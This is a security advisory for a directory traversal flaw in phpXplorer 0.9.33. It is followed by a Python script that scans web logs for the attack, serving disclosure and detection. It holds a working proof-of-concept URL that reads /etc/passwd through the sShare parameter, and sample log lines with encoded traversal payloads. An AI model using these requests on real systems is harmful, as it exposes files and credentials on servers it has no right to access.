==========================================================
Title: Directory traversal in phpXplorer

Application: phpXplorer
Vendor: http://www.phpxplorer.org
Vulnerable Versions: 0.9.33
Bug: directory traversal
Date: 16-January-2006
Author: Oriol Torrent Santiago < oriol.torrent.AT.gmail.com >
References: http://www.arrelnet.com/advisories/adv20060116.html
==========================================================

1) Background
-----------
phpXplorer is an open source file management system written in PHP.
It enables you to work on a remote file system through a web browser.

2) Problem description
--------------------
An attacker can read arbitrary files outside the web root by sending
specially formed requests.

Ex:
http://host/phpXplorer/system/workspaces.php?sShare=../../../../../../../../etc/passwd%00&ref=1

3) Solution:
----------
No Patch available.

4) Timeline
---------
17/12/2005 Bug discovered
20/12/2005 Vendor receives detailed advisory. No response
04/01/2006 Second notification. No response
16/01/2006 Public Disclosure
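
With no patch available, one way to spot the request pattern from section 2 in web server access logs, as an added example that is not part of the original advisory. It assumes Common/Combined Log Format; the function names and sample log lines are constructed for illustration, and the check also covers percent-encoded and backslash variants of the same pattern.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumed input: access-log lines in Common/Combined Log Format.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
TARGET_SUFFIX = "/system/workspaces.php"  # script named in the advisory
PARAM = "sShare"                          # parameter named in the advisory

# Constructed sample lines (not real traffic); the first uses the advisory's request.
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Jan/2006:10:00:00 +0000] "GET /phpXplorer/system/workspaces.php?sShare=../../../../../../../../etc/passwd%00&ref=1 HTTP/1.1" 200 1432',
    '192.0.2.11 - - [16/Jan/2006:10:00:05 +0000] "GET /phpXplorer/system/workspaces.php?sShare=docs&ref=1 HTTP/1.1" 200 812',
    '192.0.2.12 - - [16/Jan/2006:10:00:09 +0000] "GET /phpXplorer/system/workspaces.php?sShare=%252e%252e%252fconfig&ref=1 HTTP/1.1" 200 640',
    '192.0.2.13 - - [16/Jan/2006:10:00:12 +0000] "GET /index.php?sShare=../x HTTP/1.1" 200 10',
]


def fully_decode(value, rounds=3):
    """Percent-decode several times so double-encoded input (%252e) is caught."""
    for _ in range(rounds):
        value = unquote(value)
    return value


def suspicious_share(value):
    """Return the reasons an sShare value looks like a traversal attempt."""
    decoded = fully_decode(value)
    reasons = ["null-byte"] if "\x00" in decoded else []
    if ".." in re.split(r"[\\/]", decoded.replace("\x00", "")):
        reasons.append("dot-dot-segment")
    return reasons


def scan(lines):
    """Yield (line_number, reasons) for requests matching the advisory pattern."""
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        url = urlsplit(m.group(1)) if m else None
        if url is None or not fully_decode(url.path).endswith(TARGET_SUFFIX):
            continue
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            reasons = suspicious_share(value) if key == PARAM else []
            if reasons:
                yield n, reasons


if __name__ == "__main__":
    for n, reasons in scan(SAMPLE_LOG):
        print(f"line {n}: sShare flagged ({', '.join(reasons)})")
```

A hit only shows that such a request was received; the response status and size in the same log line help judge whether file contents were returned.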